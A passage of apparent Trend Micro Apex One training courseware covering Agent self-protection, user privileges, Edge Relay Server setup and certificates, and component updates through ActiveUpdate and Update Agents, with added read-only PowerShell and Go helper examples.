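	return "Default"
}

func main() {
	// Constructed rule set and Agents; nothing here is a real network.
	hq, _ := NewIPRule("HQ", "10.1.0.0/16", "192.0.2.10-192.0.2.20")
	rules := []GroupingRule{hq, {Target: "Servers", ADDomains: []string{"srv.corp.example"}}}
	for _, a := range []AgentInfo{{"pc1", net.ParseIP("10.1.5.7"), ""}, {"srv1", nil, "SRV.CORP.EXAMPLE"}} {
		fmt.Println(a.Name, "->", Group(rules, a))
	}
}
```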

Scheduled domain sorting and creation is disabled by default. Administrators can use the Scheduled
Domain Creation settings on Agent Grouping window to set the time and frequency for this task.

The sorting rule or automatic Agent grouping criteria are stored in:
...\PCCSRV\Private\SortingRuleStore\SortingRule.xml

Viewing Agent Status


Administrators can view the status of Agents from the Apex One Web Management console or directly
on the endpoint computer.

Viewing Agent Status on the Endpoint


An icon in the Windows System Tray displays the status of the Security Agent and its connection
to the SmartScan Server.

The status combinations that the different icons represent are listed in the table below (the icon
images themselves are not reproduced here):

Connection with Apex One Server   Availability of Smart Protection Source   Real-time Scan
Online                            Available                                 Enabled
Online                            Unavailable/Reconnecting                  Enabled
Offline                           Available                                 Enabled
Offline                           Unavailable/Reconnecting                  Enabled
Online                            Available                                 Service not running
Online                            Available                                 Manually disabled

Viewing Agent Status in the Web Management Console


Administrators can view the status of the Agent from the Agents list in the Web Management
Console.

Agent Self Protection


The protection that Apex One offers depends entirely on the ability of the Security Agent to implement
authentic Apex One Server settings. The Agent, therefore, must be protected from all unauthorized
attempts to change settings, which are all stored in the Windows Registry, and to disrupt its services.
Unauthorized Change Prevention is responsible for evaluating system access events like file I/O and
prevents unauthorized changes to registry keys and processes.

Security Agents maintain two layers of protection for their settings:


• Change prevention: This is a proactive defense measure. It is aimed at blocking unauthorized
changes from happening in the first place.
• Security Agent service restart: Apex One restarts Agent services that stopped responding
unexpectedly and were not stopped by a normal system process.

Configuring Unauthorized Change Prevention


Apex One protects Agent components and settings using the Unauthorized Change Prevention
Service. This service is responsible for protecting Security Agents from changes other than those
made through either the Apex One Server or Agent consoles.

The service appears in the Windows Service Control. The service itself is responsible for evaluating
system access events (for example, file I/O, registry access, etc.) based on event-handling policies,
and then taking action upon these events in accordance with the relevant policies (for example,
prevent the change, block access, etc.)

When the options to protect registry keys and services are enabled in the Apex One Web
management console, the NT Real-time Scan mechanism passes the relevant policy information to
the Unauthorized Change Prevention Service, which then converts the information into policies that
it implements.

To configure Security Agent self-protection, click Agents > Agent Management. Select the
appropriate domain, group or individual Agent from the list and click Settings > Privileges and Other
Settings. On the Other Settings tab, the following options are available:

• Protect Security Agent services: Apex One blocks all attempts to terminate the following
Security Agent services:
- Apex One NT Listener (TmListen.exe)
- Apex One NT RealTime Scan (NTRtScan.exe)
- Apex One NT Firewall (TmPfw.exe)
- Apex One Data Protection Service (dsAgent.exe)
- Trend Micro Unauthorized Change Prevention Service (TMBMSRV.exe)
- Trend Micro Common Client Solution Framework (TmCCSF.exe)

Note: If this option is enabled, the Security Agent may prevent third-party products from installing
successfully on endpoints. If you encounter this issue, you can temporarily disable the option
and then re-enable it after the installation of the third-party product.

• Protect files in the Security Agent installation folder: To prevent other programs and even the
user from modifying or deleting Security Agent files, Apex One provides several enhanced
protection capabilities. After enabling Protect files in the Security Agent installation folder,
Apex One locks the following files in the root Agent installation folder:
- All digitally-signed files with .exe, .dll, and .sys extensions
- Some files without digital signatures, including:
- bspatch.exe
- bzip2.exe
- NETWH32.dll
- libcurl.dll
- libeay32.dll
- libMsgUtilExt.mt.dll
- msvcm80.dll
- MSVCP60.DLL
- msvcp80.dll
- msvcr80.dll
- OfceSCV.dll
- OFCESCVPack.exe
- patchbld.dll
- patchw32.dll
- patchw64.dll
- PiReg.exe
- ssleay32.dll
- Tmeng.dll
- TMNotify.dll
- zlibwapi.dll
After enabling Protect files in the Security Agent installation folder and Real-time Scan for virus/
malware threats, Apex One also performs the following actions:
- File integrity checking before launching .exe files in the installation folder: During
ActiveUpdate updates, Apex One verifies that the file triggering the update is signed by
Trend Micro. If the issuer is not recognized as Trend Micro and ActiveUpdate cannot replace
the incorrect file, Apex One logs the incident in the Windows event logs and blocks the
update.
- Prevents DLL hijacking: Some malware writers copy dynamic link library files into the Security
Agent installation folder or the Behavior Monitoring folder so that these files are loaded in
place of, or before, the Agent's own libraries, disrupting the protection offered by Apex One.
To defeat this, Apex One blocks the copying of files into the installation folder and the
Behavior Monitoring folder.


• Protect Security Agent registry keys: The Security Agent blocks all attempts to modify, delete,
or add new entries under the following registry keys and subkeys:
- HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion
- HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\NSC
- HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey
- HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\AMSP
• Protect Security Agent processes: The Security Agent blocks all attempts to terminate the
following processes:
- TmListen.exe: Receives commands and notifications from the Apex One Server and
facilitates communication from the Security Agent to the Server
- NTRtScan.exe: Performs Real-time, Scheduled, and Manual Scan on Security Agents
- TmProxy.exe: Scans network traffic before passing it to the target application
- TmPfw.exe: Provides packet-level firewall, network virus scanning, and intrusion detection
capabilities
- TMBMSRV.exe: Regulates access to external storage devices and prevents unauthorized
changes to registry keys and processes
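
The following PowerShell script is an added example and is not part of the Trend Micro courseware or
product. It performs a read-only check that the self-protection targets listed above (the protected
processes and registry keys) are actually present on an endpoint, which is the first thing to verify
when an Agent appears to have been stopped or tampered with. Assumptions: process names are the
executable names from the list without the .exe suffix; TmPfw, dsAgent and TmProxy are treated as
optional because they depend on which features are installed; and on 64-bit Windows the 32-bit
Agent keys may live under Wow6432Node, so both views of HKLM\SOFTWARE are probed.

```powershell
# Added example (not Trend Micro code): read-only check of the Security Agent self-protection
# targets. Run from an elevated PowerShell prompt on the endpoint.

$ProtectedProcesses = @(
    @{ Name = 'TmListen'; Required = $true  }   # Apex One NT Listener
    @{ Name = 'NTRtScan'; Required = $true  }   # Apex One NT RealTime Scan
    @{ Name = 'TMBMSRV';  Required = $true  }   # Unauthorized Change Prevention Service
    @{ Name = 'TmCCSF';   Required = $true  }   # Common Client Solution Framework
    @{ Name = 'TmPfw';    Required = $false }   # NT Firewall (optional feature: assumption)
    @{ Name = 'dsAgent';  Required = $false }   # Data Protection Service (optional feature: assumption)
    @{ Name = 'TmProxy';  Required = $false }   # Traffic scanning proxy (feature dependent: assumption)
)

$ProtectedKeys = @(
    'SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion'
    'SOFTWARE\TrendMicro\NSC'
    'SOFTWARE\TrendMicro\Osprey'
    'SOFTWARE\TrendMicro\AMSP'
)

function Test-ApexOneSelfProtectionTargets {
    $running  = (Get-Process).ProcessName
    $findings = New-Object System.Collections.Generic.List[object]

    foreach ($p in $ProtectedProcesses) {
        $present = $running -contains $p.Name
        if ($present)        { $status = 'OK' }
        elseif ($p.Required) { $status = 'MISSING' }
        else                 { $status = 'ABSENT (optional feature)' }
        $findings.Add([pscustomobject]@{
            Type    = 'Process'
            Target  = "$($p.Name).exe"
            Present = $present
            Status  = $status
        })
    }

    foreach ($rel in $ProtectedKeys) {
        # Native 64-bit view first, then the WOW64 view used by 32-bit components on x64 hosts
        # (assumption: the Agent may register under either, depending on bitness).
        $native = "HKLM:\$rel"
        $wow64  = "HKLM:\SOFTWARE\Wow6432Node\" + $rel.Substring('SOFTWARE\'.Length)
        $found  = @($native, $wow64) | Where-Object { Test-Path -Path $_ } | Select-Object -First 1
        if ($found) { $status = "OK ($found)" } else { $status = 'MISSING' }
        $findings.Add([pscustomobject]@{
            Type    = 'RegistryKey'
            Target  = "HKLM\$rel"
            Present = [bool]$found
            Status  = $status
        })
    }
    return $findings
}

$report = Test-ApexOneSelfProtectionTargets
$report | Format-Table -AutoSize
if ($report | Where-Object { $_.Status -eq 'MISSING' }) {
    Write-Warning 'Required self-protection targets are missing: the Security Agent may be stopped or tampered with.'
}
```

The script deliberately does not try to stop a process or write to a protected key to prove that
protection is active: if Self-Protection happened to be disabled, such a probe would itself damage
the Agent. Confirm the setting from the Web management console instead.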

Kernel Mode Termination Protection (new in this release)

Unauthorized Change Prevention blocks user-mode termination events, but some applications can
terminate processes from kernel mode. To address this, Apex One introduces a Watchdog mechanism for
kernel-mode termination events, which attempts to recover the target processes after they have been
terminated.

When the Security Agent starts, its services monitor the Agent processes on the endpoint. If a
terminate event is received, Watchdog is called to check whether the target process is still alive;
if the process is not running, Watchdog recovers the service. Watchdog depends on Agent
Self-Protection, so ensure that Security Agent Self-Protection is enabled to use this feature.

Security Agent Service Restart


Apex One restarts Agent services that stopped responding unexpectedly and were not stopped by a
normal system process.


To configure the settings that allow Security Agent services to restart, go to Agents > Global Agent
Settings and, on the System tab, go to the Services Restart section. Select Automatically restart any
Security Agent service if the service terminates unexpectedly.

• Restart the service after __ minutes: Specify the amount of time (in minutes) that must
elapse before Apex One restarts a service.
• If the first attempt to restart the service is unsuccessful, retry __ times: Specify the
maximum number of retry attempts for restarting a service. Manually restart a service if it
remains stopped after the maximum number of retry attempts.
• Reset the unsuccessful restart count after __ hour(s): If a service remains stopped after
exhausting the maximum retry attempts, Apex One waits the specified number of hours and then
resets the failure count. If the service is still stopped when that period elapses, Apex One
tries to restart it again.

Agent Privileges
Modify privileges to grant users the ability to modify certain settings and perform high level tasks on the
Security Agent. To grant privileges, click Agents > Agent Management. In the Agent tree, click the root
domain icon to include all Agents or select specific domains or Agents. Click Settings > Privileges and
Other Settings.


Independent Mode Privileges


Independent mode privileges can be granted to certain users if Agent-Server events are interfering
with the users' tasks. For example, a user who frequently gives presentations can enable Independent
mode before starting a presentation to prevent the Apex One Server from deploying Security Agent
settings and initiating scans on the Security Agent.


When Security Agents are in Independent mode:


• Security Agents do not send logs to the Apex One Server, even if there is a functional
connection between the Server and Agents.
• The Apex One Server does not initiate tasks and deploy Security Agent settings to the
Agents, even if there is functional connection between the Server and Agents.
• Security Agents update components if they can connect to any of their update sources.
Sources include the Apex One Server, Update Agents, or a custom update source.

The following events trigger an update on Independent Agents:


• The user performs a manual update.
• Automatic Agent update runs. You can disable automatic Agent update on Independent
Agents.
• Scheduled update runs. Only Agents with the required privileges can run scheduled updates.
You can revoke this privilege anytime.


Scan Type Privileges


Allow users to configure their own Manual Scan, Real-time Scan and Scheduled Scan settings.

Firewall Privileges
Allow users to configure their own firewall settings. User-configured settings cannot be
overridden by settings deployed from the Apex One Server. For example, if the user disables the
Intrusion Detection System (IDS) and you enable IDS on the Apex One Server, IDS remains disabled
on the Security Agent endpoint. Grant this privilege only where that outcome is acceptable, because
the Server cannot reassert its firewall policy on the endpoint while the privilege is in effect.


Behavior Monitoring Privileges


If Agents have the Behavior Monitoring privileges, the Behavior Monitoring option displays on the
Settings screen on the Security Agent console. Users can then manage their own exception list.

Trusted Program List Privilege


You can grant end users the privilege to configure Apex One to skip scanning of trusted processes
during Real-time Scan and Behavior Monitoring. After a program is added to the Trusted Program
List, Apex One does not subject the program, or any process it starts, to Real-time Scan. Add
trusted programs to the Trusted Program List to improve scanning performance on endpoints, but
keep in mind that every listed program and its child processes are exempt from Real-time Scan, so
giving users this privilege widens the set of unscanned code on the endpoint.


Mail Scan Privileges


When Security Agents have the mail scan privileges, the Mail Scan option displays on the Security
Agent console.

Proxy Configuration Privileges


This privilege allows users to configure proxy settings on the Security Agent console.


Update Privileges
Configure update settings to grant Agent users privileges, such as performing an Update Now.

Agent Unloading and Unlocking Privilege


This privilege allows Security Agents to be unloaded by users without a password.


Agent Uninstallation Privilege


This privilege allows uninstallation by users without a password.



Lesson 5: Managing Off-Premise Agents

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define the responsibilities of the Apex One Edge Relay Server
• Install the Apex One Edge Relay Server
• Register the Apex One Edge Relay Server with the Apex One Server

Off-premise management of Security Agents is made possible through the Apex One Edge Relay Server.
This allows administrative users to maintain visibility of roaming Agents (for example, traveling users)
even when they are not using a VPN to connect into their corporate network.

The Edge Relay Server acts as a reverse proxy between off-premise Agents and the Apex One Server
allowing these Agents to sync data with the Apex One Server. The architecture of the Edge Relay Server
in Apex One has been updated to forward all Agent requests to the Apex One Server, including
configuration and policy details. The location for the Edge Server can be anywhere (in the DMZ network,
cloud, etc.), as long as:
• It is publicly available to the Agent
• The Apex One Server can reach it

After configuring the Edge Relay Server, Security Agents receive settings and automatically report to
the Edge Relay Server once a connection to the Apex One Server is unavailable.

Communication between the Edge Relay Server, Apex One Server, and Security Agents is secured using
HTTPS.

One Apex One Edge Relay Server can serve multiple Apex One Servers and their external Agents;
however, an Apex One Server can register with ONLY one Apex One Edge Relay Server.

Note: Previous versions of the Edge Relay Server provided limited Security Agent protection features.
The version of the Edge Relay Server provided with Apex One now enables full Security Agent
capabilities to remote Agents, including configuration settings.


[Figure: Edge Relay Server and External Agent Communications. Several Apex One Servers connect to one
Apex One Edge Relay Server over port 443; remote Security Agents connect to the Edge Relay Server
over port 443.]
Security Agents report data to the Apex One Edge Relay Server provided that the following
conditions are met:
• The Agent location is set to out of office.
• The Agent has the Edge Relay Server connection information and certificate in its registry key.

[Figure: Edge Relay Server request path. Remote Security Agents on the Internet send HTTPS requests
to the Apex One Edge Relay Server in the DMZ; the IIS Rewrite Module applies its rewrite rules and
forwards the requests over HTTPS to the Apex One Master Service (ISAPI/CGI) on the Apex One Server
in the internal network.]

The IIS Rewrite Module, installed as a component of the IIS Web Server on the Edge Relay Server, serves
as a reverse proxy to forward requests from Security Agents on the Internet to the Apex One Server on
the internal network. The IIS Rewrite Module will replace the Server and port details received from the
remote Agents with the Server and port details of the Apex One Server. The Edge Relay Server then
forwards the request to the URL of the Apex One Server.


Installing the Apex One Edge Relay Server


Before installing the Edge Relay Server, ensure that the target server computer meets the minimum
system requirements.

Resource            Requirements
Processor           2 GHz dual core
Memory              512 MB minimum
Disk space          110 MB
Operating system    Windows Server 2016
                    Windows Server 2012 R2
Web Server          Microsoft Internet Information Services (IIS)
Network card        Network card configured to use different ports for intranet and
                    Internet connections
Database            The version of the Edge Relay Server used with Apex One no longer
                    requires a database

Note: The Edge Relay Server does not require two separate network interfaces as the same network
interface can be used for internal and external communications as different ports are used
internally and externally. However, if required for other purposes, having two network interfaces
on the same machine as the Edge Relay Server is supported.

To install the Edge Relay Server, perform the following steps:


1 Locate the following folder on the Apex One Server computer, and copy the folder to the target
Edge Relay Server computer:
...\PCCSRV\Admin\Utility\EdgeServer
2 On the target Edge Relay Server, open the ...\EdgeServer folder and double-click
setup.exe to start the setup process.


3 The setup package checks the server for required components. If any of the required Windows
components do not exist on the server, click Install to allow the setup program to install the
missing components during the Edge Relay Server installation process.

4 The Welcome screen is displayed. Click Next.

5 Accept the default installation directory or click Change... to select a different location and click
Next.


6 Specify the following settings that off-premises Security Agents use to connect to the Edge
Relay Server and click Next:
• Fully qualified domain name (FQDN)
• Certificate
• IP address
• Port

Note: The Edge Relay Server does not support IPv6 communication.

Note: You must configure your firewall and gateway to allow redirection of the Security Agent
communication from the Internet to the Edge Relay Server and communication through the port
specified.

7 If no certificate is selected, an option to allow the setup to create a self-signed certificate is
displayed. Click Yes to allow the setup to generate a certificate.


8 Specify and confirm the password used for the Edge Relay Server certificate and click Next.

9 The Installation Information screen is displayed for review. Click Next to begin the setup.

10 The program files are installed.


11 Click Finish to complete the setup.

Registering the Edge Relay Server


After installing, you must use the Edge Relay Server Registration Tool to register the Edge Relay Server
with each Apex One Server that off-premises Security Agents report to. Security Agents reporting to the
Apex One Servers receive the registered connection settings and can automatically use the Edge Relay
Server to contact the Apex One Server after leaving the corporate intranet.

On the Edge Relay Server computer, open a Command Prompt and navigate to the following folder:
C:\Program Files\Trend Micro\Apex One Edge Relay\OfcEdgeSvc

Type the following command to register the Edge Relay Server:

ofcedgecfg.exe --cmd reg --server <server address> --port <port> --pwd <root password>

Where:
<server address> is the Apex One Server IP address
<port> is the Apex One Server port number
<root password> is the Apex One Server root account password

For example:
ofcedgecfg.exe --cmd reg --server 192.168.4.1 --port 4343 --pwd trendmicro

Note: The root password is supplied as a command-line argument, so it is visible to any local user
who can list running processes while the tool runs, and it may be retained in the shell's command
history. Run the command interactively rather than from a saved script, and do not leave it in
history or log files.

To view the status of the connection between the Apex One Server and the Edge Relay Server after
registering, open the Apex One Web Management console and go to Administration > Settings > Edge
Relay.


To view other Edge Relay configuration commands, refer to the Edge Relay Server Registration Tool
section in the Apex One Administrator Guide.


Viewing Off-Premise Agents


To view Agents that recently connected to the Apex One Edge Relay Server, click Off-premise Agent
view on the Agent Management page.

Administrators can also use the Off-Premise widget, which displays the history of the Agent
connection status. The time range can be switched between Last 7 days and Last 24 hours.

Apex One Edge Relay Server Digital Certificates

Since the Apex One Edge Relay Server does not reside on the local network, certificates must be used to
secure the data exchange channel. The certificates needed include the following:

Certificate Name       Certificate Path                                      Comments
OsceEdgeRoot           OSCE EDGE server - Trusted Root Certification         Edge Relay Server self-signed
                       Authority > Certificates                              certificate
OsceOPA                OSCE Agent (off-premise) - OfcEdge > Certificates     Agent-server communication
                                                                             authenticated
Osceds (OfcsslAgent)   OSCE EDGE data server - Personal > Certificates       Encrypts data exchanged between
                                                                             Agents and the Edge Relay Server,
OsceDS                 OSCE EDGE server / Agent - Trusted People >           and between the Edge Relay Server
                       Certificates                                          and the Apex One Server


The certificate deployment process includes the following steps:

1 The OsceEdgeRoot certificate is generated during the installation of the Apex One Edge Relay
Server.
2 When the Apex One Server connects to the Edge Relay Server, the OsceEdgeRoot certificate is
deployed to the Apex One Server.
3 When a Security Agent connects to the Apex One Server, the Server deploys this new certificate
to the Agent. Once the Security Agent has the certificate, it can communicate with and send
information to the Apex One Edge Relay Server when required.

Note: An endpoint only becomes aware of the Edge Relay Server after it has connected to the Apex
One Server at least once after the Edge Relay Server was installed and registered.

Renewing Edge Relay Server Certificate


The Edge Relay Server Registration Tool can also be used to manually import/renew the certificate
that is used to establish the Apex One Edge Relay Server connection. To renew the certificate,
execute the following command:
OfcEdgeCfg.exe --renewcert --certpwd <password>

Off-premises Security Agents must connect to the Apex One Server to obtain the new Edge Relay
Server certificate. Any off-premises Agent that has not received the updated certificate can no
longer communicate with the Edge Relay Server until it next connects to the Apex One Server. Plan
certificate renewals for a time when roaming Agents are expected back on the corporate network, or
are otherwise able to reach the Apex One Server directly, so that they do not lose their management
channel.
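
The following PowerShell script is an added example and is not Trend Micro code. It inventories the
Edge Relay certificates from the table above in the Edge Relay Server's machine certificate stores
and flags the ones that are close to expiry, so that the --renewcert step can be scheduled while
roaming Agents are still able to pick up the new certificate from the Apex One Server. Assumptions:
each certificate's Subject contains the name shown in the table (matched case-sensitively, because
"Osceds" and "OsceDS" differ only in case); the store names map Trusted Root to Root, Personal to
My and Trusted People to TrustedPeople; and the OfcEdge store holding OsceOPA exists on off-premises
Agents rather than on the Edge Relay Server, so it is treated as optional here.

```powershell
# Added example (not Trend Micro code): inventory Edge Relay certificates and flag upcoming expiry.
# Run from an elevated PowerShell prompt on the Edge Relay Server.

$ExpectedCerts = @(
    @{ Name = 'OsceEdgeRoot'; Store = 'Root';          Optional = $false; Role = 'Edge Relay self-signed root' }
    @{ Name = 'Osceds';       Store = 'My';            Optional = $false; Role = 'Edge data server certificate' }
    @{ Name = 'OsceDS';       Store = 'TrustedPeople'; Optional = $false; Role = 'Trusted data server certificate' }
    @{ Name = 'OsceOPA';      Store = 'OfcEdge';       Optional = $true;  Role = 'Off-premises Agent certificate (Agent side)' }
)

function Get-EdgeRelayCertificateStatus {
    param([int]$WarnDays = 30)

    foreach ($c in $ExpectedCerts) {
        $path  = "Cert:\LocalMachine\$($c.Store)"
        $certs = @()
        if (Test-Path -Path $path) {
            # -clike: case-sensitive match, since two of the expected names differ only in case.
            $certs = @(Get-ChildItem -Path $path | Where-Object { $_.Subject -clike "*$($c.Name)*" })
        }

        if ($certs.Count -eq 0) {
            if ($c.Optional) { $status = 'ABSENT (optional on this host)' } else { $status = 'MISSING' }
            [pscustomobject]@{
                Name = $c.Name; Store = $c.Store; Role = $c.Role
                Thumbprint = $null; NotAfter = $null; Status = $status
            }
            continue
        }

        foreach ($cert in $certs) {
            $daysLeft = [int][math]::Floor(($cert.NotAfter - (Get-Date)).TotalDays)
            if ($daysLeft -lt 0)             { $status = 'EXPIRED' }
            elseif ($daysLeft -le $WarnDays) { $status = "EXPIRING in $daysLeft day(s)" }
            else                             { $status = 'OK' }
            [pscustomobject]@{
                Name = $c.Name; Store = $c.Store; Role = $c.Role
                Thumbprint = $cert.Thumbprint; NotAfter = $cert.NotAfter; Status = $status
            }
        }
    }
}

# Usage: list every expected certificate and warn 45 days ahead of expiry.
Get-EdgeRelayCertificateStatus -WarnDays 45 | Format-Table -AutoSize
```

A MISSING root or data-server certificate on the Edge Relay Server means off-premises Agents cannot
authenticate the relay at all, and an EXPIRING one is the cue to run OfcEdgeCfg.exe --renewcert
early enough for Agents to reconnect to the Apex One Server before the old certificate lapses.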

Lesson 6: Keeping Trend Micro Apex One Up To Date

Lesson Objectives:

After completing this lesson, participants will be able to:


• Update the Apex One Server
• Update Security Agents
• Promote Security Agents to become Update Agents

When updates are available, the Apex One Server and Smart Protection sources (Smart Protection
Server or Smart Protection Network) download the updated components. There are no component
download overlaps between the Apex One Server and Smart Protection sources because each one
downloads a specific set of components.

You can configure both the Apex One Server and Smart Protection Server to update from a source other
than the Trend Micro ActiveUpdate Server. To do this, you need to set up a custom update source.

The Apex One Server downloads most of the components that Agents need. The only component it does
not download is the Smart Scan Pattern, which is downloaded by smart protection sources. If the Apex
One Server manages a large number of Agents, updating may utilize a significant amount of Server
computer resources, affecting the Server’s stability and performance. To address this issue, Apex One
has an Update Agent feature that allows certain Agents to share the task of distributing updates to
other Agents.

ActiveUpdate
Apex One uses Trend Micro ActiveUpdate to obtain and distribute updates for specific program
components. Two types of components can be updated:
• Patterns
• Engines

The ActiveUpdate (AU) module is Apex One’s interface to the ActiveUpdate system. As a Trend Micro
common module, this module is developed independently of other products.

ActiveUpdate Integrity
With the increase in reports of Advanced Persistent Threat (APT) attacks against organizations,
signature verification was integrated into the Apex One ActiveUpdate process to prevent
man-in-the-middle attacks, in which an attacker uses ARP spoofing to redirect the Agent to a
malicious update source under the attacker's control.


Integrity of the ActiveUpdate package is verified through digital signatures. The Apex One Server
and Agents verify this signature on the update package before downloading the components. This
ensures that the components being downloaded have been provided by Trend Micro and have not
been tampered with.

To verify that this feature is enabled, locate and open the ofcscan.ini file on the Apex One Server.
In the [Global Setting] section, confirm that EnforceAUSign=1 is present.

Pattern Updates
Trend Micro releases two types of pattern updates:
• Official Pattern Release: Patterns are regularly made available to users as part of an Official
Pattern Release (OPR). Upon release, these patterns are posted on the ActiveUpdate system
once per day, where products can download using the default update source.
• Controlled Pattern File Release: A pre-release version of a Trend Micro virus pattern file. It
is a fully tested pattern file intended to provide additional antivirus protection between
official pattern file releases.

Incremental Updates
Incremental update technology limits the impact of updates on network bandwidth. This was
originally only available for virus pattern updates, but has now been applied to other patterns. It
does not, however, apply to engine updates.

For each new pattern on the Trend Micro update Server, there are several incremental patterns.
Each incremental pattern contains the difference between the malware signatures in the latest
version, and the version to which the increment corresponds.

Increments are provided for the 14 most recent Official Pattern Releases. If the pattern used in a
product is older than any of the 14 incremental patterns, then the latest full pattern is downloaded.

ActiveUpdate Logs
ActiveUpdate-related activities are recorded in two logs:
• TmuDump.txt: The ActiveUpdate module records all its actions in this log, making it a very
important source of troubleshooting information when analyzing update-related problems. This
log can be written as a text file or as an HTML file, depending on settings in the ActiveUpdate
configuration file.
• Ofcdebug.log: Apex One services record their activities in this log, making it ideal for
studying calls from the product to the ActiveUpdate module.

The log files can be located in the following folder:

...\PCCSRV\Web\AU_Data\AU_Log


Updating the Apex One Server


Apex One Server components can be updated manually or by configuring an update schedule.

Manual Server Updates


When an update is critical, perform a manual update so the Apex One Server can obtain the updates
immediately. In the Web Management console, click Updates > Server > Manual Update.


Scheduled Server Update


A scheduled update allows the Apex One Server to connect to the update source during the specified
day and time to obtain the latest components. In the Web Management console, click Updates >
Server > Scheduled Update.

Server Update Source


If the Apex One Server belongs to a network that is isolated completely from all outside sources, you
can keep the server’s components up-to-date by letting it update from an internal source that
contains the latest components. This source can also be used in situations where an organization
might want to control the release of new patterns, only allowing the patterns to be applied after
internal testing.

The update source, such as Apex Central or any other designated host, must have a reliable Internet
connection so that it can download the latest components from the Trend Micro ActiveUpdate
server. Without an Internet connection, the only way for the update source to have the latest
components is to obtain the components yourself from Trend Micro and then copy them into the
update source. Configure proxy settings if there is a proxy server between the Apex One Server and
the update source, and ensure that there is enough disk space for downloaded components. In the
Web Management console, click Updates > Server > Update Source.


Updating Security Agents


To allow the Server to deploy the updated components to Agents, enable Automatic Agent update. If
automatic Agent update is disabled, the Server downloads the updates but does not deploy them to the
Agents.

Automatic Updates
Agent updates can run automatically when certain events occur or when scheduled. In addition to
components, Security Agents also receive updated configuration files during automatic update. In
the Web Management console, click Updates > Agents > Automatic Update


Event-Triggered Updates

The Server can notify online Agents to update components after it downloads the latest
components, and offline Agents when they restart and then connect to the Server.

Schedule-based Updates

Security Agents with appropriate privileges will run updates based on the schedule.

Manual Updates
When an update is critical, use Manual Update to immediately notify Agents to perform a component
update. In addition to components, Security Agents also receive updated configuration files
automatically during a Manual Update. In the Web Management console, click Updates > Agents >
Manual Update.


Privilege-based Updates
Users with update privileges have greater control over when the Security Agent on their computers
gets updated.

Agent Update Source


An alternate source for updates can be selected for specific Agents. In the Web Management
console, click Updates > Agents > Update Source.


Update Agents
Update Agents are Security Agents that function as alternative update sites for other Agents within an
Apex One network. They permit the deployment of settings to Agents whose connections to the Apex
One Server are sufficient for regular Agent-Server messages but not for bandwidth-intensive updates,
including:
• Component updates
• Domain settings
• Agent programs and hot fixes

Update Agents serve as local ActiveUpdate sites. Like the Apex One Server, they offer both full and
incremental patterns to their Agents from their own ActiveUpdate folder.

Best Practice: Any Security Agent can be promoted to an Update Agent, but it is recommended to
use an Agent on an endpoint computer that remains powered on at all times.

Without Update Agents, all endpoint computers contact the Apex One Server for updates. In installations
with many Security Agents, this can create network traffic issues.

[Figure: Without Update Agents. The Trend Micro Apex One Server downloads from the Update Server, and
every Security Agent contacts the Apex One Server directly for updates.]


With Update Agents in place, endpoint computers will contact their Update Agents for updates instead of
contacting the Apex One Server. This reduces the amount of network traffic destined for the Apex One
Server. Security Agent are assigned Update Agents based on their IP addresses.

[Figure: With Update Agents. The Trend Micro Apex One Server downloads from the Update Server, Update
Agents download from the Apex One Server, and Security Agents download from their assigned Update
Agents.]

Best Practice: Since a single update agent can handle update requests from around 250 endpoints, it
is recommended to create one update agent for every 250 endpoints. Do not promote
the Security Agent on an Apex One Server to become the Update Agent.

Promoting an Agent to an Update Agent


Promoting an Agent to an Update Agent is a two-step process:
1 Right-click any Security Agent in the Agents list and click Update Agent Settings. Select the
components to be delivered by the Update Agent and click Save.


2 Modify the update source for a range of IP addresses. Click Updates > Agents > Update Source.
Click Customized Update Source and Add. Identify an IP address range and select the Update
Source as the newly created Update Agent.

Update Components
Components that Update Agents make available to other Security Agents are stored in the
ActiveUpdate folder. This is essentially a copy of the download folder on the Apex One Server.

The components that the Update Agent itself uses, for its own purposes, are still stored in the main
Security Agent folder.


The default Update Agent downloads the following components when the Agent is promoted to
Update Agent status. The approximate size of a typical Update Agent and the elements it needs to
download to become an Update Agent is outlined here.

Items stored                                  Location                    Approximate size
Scan engine and pattern file updateable       \engine, \pattern           70 MB
components
Domain settings                               \Safsaf.7z                  75 MB*
Programs and hot fixes                        \Apex One, newpnt.zip,      250 MB
                                              newpx64.zip
Additional                                                                200 MB

* Each domain with different settings adds about 9 KB.

Promotion of an Agent to a default Update Agent transfers approximately 600MB of files to the
Security Agent. It is, however, able to provide incremental updates to its Agents immediately.

Downloading and Deploying Updates


ActiveUpdate is used on Apex One networks for both obtaining updates from an update source, and then
deploying them to Security Agents. The update process in an Apex One network can be broken down into
the following steps.
1 Apex One determines if updates are required
The process begins when Apex One Server uses its ActiveUpdate module to download a server
definition file (server.ini) from a pre-selected ActiveUpdate Server. The download could have
been initiated either manually, or by a scheduled update event.
Server.ini contains a list of the versions of components currently available on the
ActiveUpdate Server. ActiveUpdate compares the information in this file with the files on the
Apex One Server to determine if an update is necessary.

Note: The Apex One Master Service is responsible for calling the ActiveUpdate module.

2 Updates are downloaded


If the ActiveUpdate module determines that an update is required, it downloads the necessary
components from the ActiveUpdate Server. Afterwards, it updates its own server.ini file.
3 Update Agent notification and download
In response to an update request, the Apex One Server identifies Update Agents on its database.
Once identified, the Server sends a message to these Update Agents.
After notifying the Update Agents, the server waits (by default 15 minutes) for the Update Agents
to obtain their updates, and retries 5 times if no response has been received. This waiting period
is defined in ofcscan.ini by the Download_TimeOut_RA parameter under the
[INI_SERVER_SECTION] section.
You can also use the SvrTune.exe, located in the ...\PCCSRV\Admin\Utility\SvrTune
folder to change the settings.


4 Agent notification
After completing the download, Apex One can do one of the following:
• Immediately deploy updates to its Agents (default)
• Store updates for use in either a manual update deployment, or an Agent-initiated update
At deployment time, Apex One notifies its Agents about the availability of new components,
thereby prompting Agents to use their respective ActiveUpdate modules to download the Apex
One server.ini file.
5 Agents determine if updates are required
Upon receipt of the update notification, the Security Agents perform the same update
verification done in Step 1. However in the Agent’s case, the update source is either the Apex One
Server itself, or an alternative update source.
6 Agents download updates
Agents download the increments or patterns as needed.
7 Agent notifies server it has the update
Agents notify their Apex One Server that they have been updated.

Security Compliance
Use Security Compliance in an on-premise environment to ensure that Agents have the latest services,
components, settings and have run recent scans. Security Compliance determines component
inconsistencies between the Apex One Server and Agents.

Security Compliance generates a Compliance Report to help you assess the security status of Security
